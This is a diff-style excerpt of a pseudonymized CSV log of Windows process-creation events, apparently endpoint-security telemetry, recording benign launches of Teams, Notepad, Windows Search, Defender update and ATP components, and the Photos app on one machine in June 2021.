+510,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 06:58:50.582285800+00:00,5820,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_N2I2MWUxNGUtMTBjZS00ZmY2LTk1ZjMtNGFhZDEyNTZhM2Nh%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.981443600+00:00,16216,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:58:50.707740300+00:00,2021-06-24 07:00:16.890303300+00:00,774e6e3c-8dc2-404b-9fbd-83fa74657b53,computerpii_0a470890c60768167990033d701e7bd881398861,176790,False,10.7740.19041.1052,False,11540474045175171,,11540474045176997,2021-06-24 00:52:21.981443600+00:00,16216,2021-06-24 00:52:21.981443600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16216,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-24 00:52:22.210767800+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,1.0,20481.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+511,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 06:58:51.478734500+00:00,17084,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1492,4359296852722613681,17597937106490557649,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1400 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 06:58:50.582285800+00:00,5820,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_N2I2MWUxNGUtMTBjZS00ZmY2LTk1ZjMtNGFhZDEyNTZhM2Nh%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-24 00:52:21.981443600+00:00,16216,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:58:51.575700200+00:00,2021-06-24 07:00:16.890362500+00:00,98b7e9a2-ea8c-48da-aac8-90fa082e77d6,computerpii_0a470890c60768167990033d701e7bd881398861,176791,False,10.7740.19041.1052,False,11540474045176997,,11540474045176998,2021-06-24 06:58:50.582285800+00:00,5820,2021-06-24 06:58:50.582285800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,5820,18560,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+512,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:35:06.180330700+00:00,10700,notepad.exe,"""notepad.exe"" ",PortableExecutable,2021-02-17 04:36:07.976241100+00:00,C:\Windows\System32\notepad.exe,202240,423d3ade2f14572c5bd5f546973eb493,a1dfbac053d9f93dc80792388d210a13b2f9fb69c15dacbf59e9043ea4e8afaf,a1f446d0c29913d3f863ba164efe86b6e9e5e7ff,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:35:06.295479600+00:00,2021-06-23 06:36:23.518974800+00:00,fe615277-7f34-4313-a01c-130c4317a9c5,computerpii_0a470890c60768167990033d701e7bd881398861,164086,False,10.7740.19041.1052,False,11540474045171770,,11540474045173872,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,Notepad,NOTEPAD.EXE,Notepad
+513,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:19:22.189262200+00:00,13704,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe848_ Global\UsGthrCtrlFltPipeMssGthrPipe848 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:19:23.041120800+00:00,2021-06-25 01:21:08.844722800+00:00,384f96b6-6d95-4546-a5f1-18adcaf5faa5,computerpii_0a470890c60768167990033d701e7bd881398861,183178,False,10.7740.19041.1052,False,11540474045144190,,11540474045178707,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+514,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:19:31.723447100+00:00,8940,notepad.exe,"""NOTEPAD.EXE"" C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\onboard document checklist\onboarding notes.txt",PortableExecutable,2021-02-17 04:36:07.976241100+00:00,C:\Windows\System32\notepad.exe,202240,423d3ade2f14572c5bd5f546973eb493,a1dfbac053d9f93dc80792388d210a13b2f9fb69c15dacbf59e9043ea4e8afaf,a1f446d0c29913d3f863ba164efe86b6e9e5e7ff,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:19:31.781329100+00:00,2021-06-25 01:21:08.845076100+00:00,b347aa0d-8afd-4558-b758-8e2603e39cd9,computerpii_0a470890c60768167990033d701e7bd881398861,183183,False,10.7740.19041.1052,False,11540474045178163,,11540474045178710,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,Notepad,NOTEPAD.EXE,Notepad
+515,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:12:51.296804800+00:00,13204,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 01:12:51.283378100+00:00,10068,MpCmdRun.exe,"""MpCmdRun.exe"" SignatureUpdate -ScheduleJob -RestrictPrivileges",True,2021-06-14 00:56:58.859290200+00:00,2848,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:12:51.379314200+00:00,2021-06-25 01:15:08.016889400+00:00,7a979b7a-fa33-43fe-9ab6-16b1b3c193ad,computerpii_0a470890c60768167990033d701e7bd881398861,183018,False,10.7740.19041.1052,False,11540474045178663,,11540474045178664,2021-06-25 01:12:51.283378100+00:00,10068,2021-06-25 01:12:51.283378100+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,10068,18560,TerminateProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-25 00:54:41.452989300+00:00,2021-06-14 00:56:51.807361100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+516,False,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:12:51.340304300+00:00,1340,MpCmdRun.exe,"""MpCmdRun.exe"" SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 01:12:51.283378100+00:00,10068,MpCmdRun.exe,"""MpCmdRun.exe"" SignatureUpdate -ScheduleJob -RestrictPrivileges",True,2021-06-14 00:56:58.859290200+00:00,2848,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:12:51.381520300+00:00,2021-06-25 01:15:08.016957400+00:00,66fc34ff-d201-47a3-956b-9b28fe7a3554,computerpii_0a470890c60768167990033d701e7bd881398861,183019,False,10.7740.19041.1052,False,11540474045178663,,11540474045178665,2021-06-25 01:12:51.283378100+00:00,10068,2021-06-25 01:12:51.283378100+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,10068,128,TerminateProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-25 00:54:41.452989300+00:00,2021-06-14 00:56:51.807361100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+517,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:12:51.375390800+00:00,16860,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 01:12:51.371490200+00:00,12616,MpCmdRun.exe,"""MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob -UnmanagedUpdate",True,2021-06-14 00:56:58.859290200+00:00,2848,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:12:51.384919200+00:00,2021-06-25 01:15:08.017026+00:00,1686698b-3c63-44f3-9a91-7e987120e101,computerpii_0a470890c60768167990033d701e7bd881398861,183020,False,10.7740.19041.1052,False,11540474045178666,,11540474045178667,2021-06-25 01:12:51.371490200+00:00,12616,2021-06-25 01:12:51.371490200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,12616,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-25 00:54:41.452989300+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+518,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:12:54.608130600+00:00,14204,SenseCncProxy.exe,844,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:12:54.983715+00:00,2021-06-25 01:15:08.017316800+00:00,103a8721-e253-4185-928b-89cdd2286977,computerpii_0a470890c60768167990033d701e7bd881398861,183026,False,10.7740.19041.1052,False,11540474045137006,,11540474045178670,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+519,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:12:55.492930200+00:00,17784,SenseIR.exe,"""SenseIR.exe"" ""OnlineSenseIR"" ""1980"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:12:55.543430600+00:00,2021-06-25 01:15:08.017525700+00:00,909a205a-2298-4f49-8383-cd73eb8abaca,computerpii_0a470890c60768167990033d701e7bd881398861,183029,False,10.7740.19041.1052,False,11540474045137006,,11540474045178672,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+520,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:13:54.475159400+00:00,12188,Microsoft.Photos.exe,"""Microsoft.Photos.exe"" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca",PortableExecutable,2021-03-15 03:20:29.387021800+00:00,C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe,481280,b2bf675d6f8ba980a55a315b81c371e4,98a68ea19db376520850c7bb5f2e2a4526e5e21628939b489d0698cdaaca3f92,813c1428fce18416d4e62e836b5efede1301379f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:13:54.547488100+00:00,2021-06-25 01:15:08.019527+00:00,7e7924ff-5ea2-4c48-b58a-af087004ec55,computerpii_0a470890c60768167990033d701e7bd881398861,183056,False,10.7740.19041.1052,False,11540474045136908,,11540474045178675,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,,,,,,
